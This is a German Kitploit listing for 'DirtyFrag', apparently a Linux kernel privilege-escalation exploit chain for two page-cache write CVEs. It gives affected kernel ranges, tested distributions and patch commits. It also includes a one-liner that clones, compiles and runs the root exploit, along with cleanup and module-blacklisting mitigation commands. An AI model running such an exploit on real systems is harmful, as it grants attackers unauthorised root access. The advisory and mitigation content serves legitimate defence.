Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
DirtyFrag — Linux-Kernel-Exploit-Kette (CVE-2026-43284 und CVE-2026-43500), die über xfrm-ESP- und RxRPC-Page-Cache-Schreibschwachstellen Root-Rechte erlangt. | Kitploit
Tools/GitHubGitHub/minime794/dirtyfrag
Privilege EscalationSchwachstellenanalyseExploitationBinary-Exploitation
GitHubminime794/dirtyfrag

DirtyFrag

Linux-Kernel-Exploit-Kette (CVE-2026-43284 und CVE-2026-43500), die über xfrm-ESP- und RxRPC-Page-Cache-Schreibschwachstellen Root-Rechte erlangt.

Repository anzeigen
vor 6h 15mNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Dirty-Frag

Linux CVE-2026-43284 & CVE-2026-43500

Kopiert von @V4bel :) Danke :)

Dieses Dokument beschreibt die Dirty-Frag-Schwachstellenklasse, die erstmals von Hyunwoo Kim (@v4bel) entdeckt und gemeldet wurde und mit der Root-Rechte auf wichtigen Linux-Distributionen erlangt werden können, indem die xfrm-ESP Page-Cache Write (CVE-2026-43284)-Schwachstelle mit der RxRPC Page-Cache Write (CVE-2026-43500)-Schwachstelle verkettet wird.

Dirty Frag ist ein Fall, der die Fehlerklasse erweitert, zu der Dirty Pipe und Copy Fail gehören. Da es sich um einen deterministischen Logikfehler handelt, der nicht von einem Zeitfenster abhängt, ist keine Race Condition erforderlich, der Kernel gerät bei einem fehlgeschlagenen Exploit nicht in Panik, und die Erfolgsrate ist sehr hoch.

Detaillierte technische Informationen und die Zeitleiste finden Sie hier.

root@kitploit:~
xfrm-ESP Page-Cache Write (CVE-2026-43284) wurde im Mainline-Kernel mit f4c50a4034e6 gepatcht.
RxRPC Page-Cache Write (CVE-2026-43500) wurde im Mainline-Kernel mit aa54b1d27fe0 gepatcht.

Ausnutzung: Nur in autorisierten Einsätzen ausführen !!

Oneliner: git clone https://github.com/Minime794/DirtyFrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp

Schritt für Schritt:

zuerst den Exploit kompilieren, dann die Binärdatei ausführen

gcc -O0 -Wall -o exp exp.c -lutil

./exp

!! Bereinigung

⚠️ Wichtig: Nach dem Ausführen dieses Exploits ist der Page-Cache kontaminiert. Um den verschmutzten Page-Cache zu leeren und die Systemstabilität zu gewährleisten, führen Sie entweder Folgendes aus:

echo 3 > /proc/sys/vm/drop_caches

oder starten Sie das System neu. Betroffene Versionen

root@kitploit:~
CVE-2026-43284: Die xfrm-ESP Page-Cache Write-Schwachstelle ist im Bereich von cac2661c53f3 (2017-01-17) bis f4c50a4034e6 (2026-05-05) enthalten.
CVE-2026-43500: Die RxRPC Page-Cache Write-Schwachstelle ist im Bereich von 2dc334f1a63a (2023-06-08) bis aa54b1d27fe0 (2026-05-10) enthalten.

Mit anderen Worten, die effektive Lebensdauer der Schwachstellen beträgt etwa 9 Jahre.

Dieses Dirty Frag wurde auf den folgenden Distributionsversionen getestet.

root@kitploit:~
Ubuntu 24.04.4: 6.17.0-23-generic
RHEL 10.1: 6.12.0-124.49.1.el10_1.x86_64
openSUSE Tumbleweed: 7.0.2-1-default
CentOS Stream 10: 6.12.0-224.el10.x86_64
AlmaLinux 10: 6.12.0-124.52.3.el10_1.x86_64
Fedora 44: 6.19.14-300.fc44.x86_64
...

Mitigation

root@kitploit:~
Verwenden Sie den folgenden Befehl, um die Module zu entfernen, in denen die Schwachstellen auftreten, und den Page-Cache zu leeren.

sh -c "printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' > /etc/modprobe.d/dirtyfrag.conf; rmmod esp4 esp6 rxrpc 2>/dev/null; echo 3 > /proc/sys/vm/drop_caches; true"

root@kitploit:~
Sobald die einzelnen Distributionen einen Patch zurückportieren, aktualisieren Sie entsprechend.
Tool herunterladen